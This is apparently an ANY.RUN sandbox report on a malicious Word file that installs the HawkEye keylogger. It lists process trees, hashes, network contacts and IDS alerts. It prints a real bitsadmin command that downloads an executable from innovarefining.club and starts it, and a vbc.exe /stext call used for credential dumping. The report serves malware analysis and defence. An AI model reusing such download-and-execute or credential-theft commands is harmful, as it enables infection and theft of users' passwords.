File name: | MV OCEAN EXPORTER.doc |
Full analysis: | https://app.any.run/tasks/86283e15-8c52-4b11-acc4-c7adbf4e2cf7 |
Verdict: | Malicious activity |
Threats: | Hawkeye often gets installed in a bundle with other malware. This is a Trojan and keylogger that is used to retrieve private information such as passwords and login credentials. This is an advanced malware that features strong anti-evasion functions. |
Analysis date: | March 14, 2019, 08:33:01 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines, with CRLF, LF line terminators |
MD5: | C53D471B70CBCC4D698B1E0AF270AC0C |
SHA1: | 5F7F4ADE999E3BC19A5DE7135B937C0F196B0187 |
SHA256: | A1673780273226028DC98F22E07262412B4DAD50D62C1BF34F47E40289E2B8F0 |
SSDEEP: | 6144:K7p1JCaor5eQAMW8zXO0E456gQ+HFK9ANbQEPX+sPdqq9mZiXAMxqE6lJcRwYJhL:X |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3072 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\MV OCEAN EXPORTER.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2148 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | svchost.exe | |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | ||||
2884 | cmd.exe /c bitsadmin /transfer HN /priority foreground http://innovarefining.club/Abiguy/bigg.exe %USERPROFILE%\Hjb.exe && start %USERPROFILE%\Hjb.exe | C:\Windows\system32\cmd.exe | — | EQNEDT32.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3408 | bitsadmin /transfer HN /priority foreground http://innovarefining.club/Abiguy/bigg.exe C:\Users\admin\Hjb.exe | C:\Windows\system32\bitsadmin.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: BITS administration utility Exit code: 0 Version: 7.5.7600.16385 (win7_rtm.090713-1255) | ||||
2408 | C:\Users\admin\Hjb.exe | C:\Users\admin\Hjb.exe | — | cmd.exe |
User: admin Company: Company name Integrity Level: MEDIUM Description: How is seen in task manager Exit code: 0 Version: 1.0.0.0 | ||||
3904 | "C:\Users\admin\Hjb.exe" | C:\Users\admin\Hjb.exe | Hjb.exe | |
User: admin Company: Company name Integrity Level: MEDIUM Description: How is seen in task manager Version: 1.0.0.0 | ||||
2608 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\admin\AppData\Local\Temp\tmp5DE6.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Hjb.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual Basic Command Line Compiler Exit code: 0 Version: 8.0.50727.5420 | ||||
3384 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\admin\AppData\Local\Temp\tmp7577.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Hjb.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual Basic Command Line Compiler Exit code: 0 Version: 8.0.50727.5420 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3072 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRDE0D.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3904 | Hjb.exe | C:\Users\admin\AppData\Local\Temp\25291068-43af-3e16-50f6-5889d9ce7904 | text | |
MD5:4F8D89971DF7015BA1E9815C512C1336 | SHA256:9E350516978E5CB9A9A4788B221F7C5444FC59351ADAA3C45B681FADD89C8738 | |||
3072 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:2A891164FE91BA6AC05B0BF649A261EA | SHA256:DBE2D12E45090C02E4A69E55CEC720728F1BD7706358E7ED5CE8E9FC4F94AD32 | |||
3072 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\MV OCEAN EXPORTER.doc.LNK | lnk | |
MD5:905FF4383CD66BD078873CCE7DADF4A6 | SHA256:13EA6C12E94D9AFCECCB6EE2C66AB603FEAAFFC87C486C3442E10738497F3D06 | |||
3384 | vbc.exe | C:\Users\admin\AppData\Local\Temp\tmp7577.tmp | text | |
MD5:7FB9A9AD0FD9B1E0108ED71FBB276048 | SHA256:7D63C301317E144B0133A72250AE2D8E09AF65A92E6A807EC58A71939FE530A9 | |||
2608 | vbc.exe | C:\Users\admin\AppData\Local\Temp\tmp5DE6.tmp | text | |
MD5:C48992AAE0E8FD5463A7B1617B2E0B88 | SHA256:04802C51A3EE5E9F7D48462C50B17ABC0E84D54F5525D70E4C904BCC0634C3CE | |||
3072 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:E2EC29D9C2C63614603E6890FE2B1780 | SHA256:57692798E28577113F05E0C871D46BFEEA79725650D57F89A1E911E5551E7487 | |||
3072 | WINWORD.EXE | C:\Users\admin\Desktop\~$ OCEAN EXPORTER.doc | pgc | |
MD5:88BC190874711D95C7F01883CB90B286 | SHA256:AFA83840EAD638A5336EEB84BE0890B4CEE935D6D6D98B56D2666CC0ED1F0989 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
— | — | HEAD | 200 | 80.82.222.59:80 | http://innovarefining.club/Abiguy/bigg.exe | DE | — | — | suspicious |
3904 | Hjb.exe | GET | 200 | 66.171.248.178:80 | http://bot.whatismyipaddress.com/ | US | text | 15 b | shared |
— | — | GET | 200 | 80.82.222.59:80 | http://innovarefining.club/Abiguy/bigg.exe | DE | executable | 867 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3904 | Hjb.exe | 66.171.248.178:80 | bot.whatismyipaddress.com | Alchemy Communications, Inc. | US | malicious |
3904 | Hjb.exe | 202.52.147.118:587 | mail.valenciapesquero.com | Global Media Teknologi, PT | ID | suspicious |
— | — | 80.82.222.59:80 | innovarefining.club | myLoc managed IT AG | DE | suspicious |
Domain | IP | Reputation |
---|---|---|
innovarefining.club |
| suspicious |
bot.whatismyipaddress.com |
| shared |
mail.valenciapesquero.com |
| unknown |
dns.msftncsi.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
— | — | A Network Trojan was detected | ET CURRENT_EVENTS SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016 |
— | — | A Network Trojan was detected | ET CURRENT_EVENTS SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016 |
— | — | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3904 | Hjb.exe | A Network Trojan was detected | MALWARE [PTsecurity] Spy.HawkEye IP Check |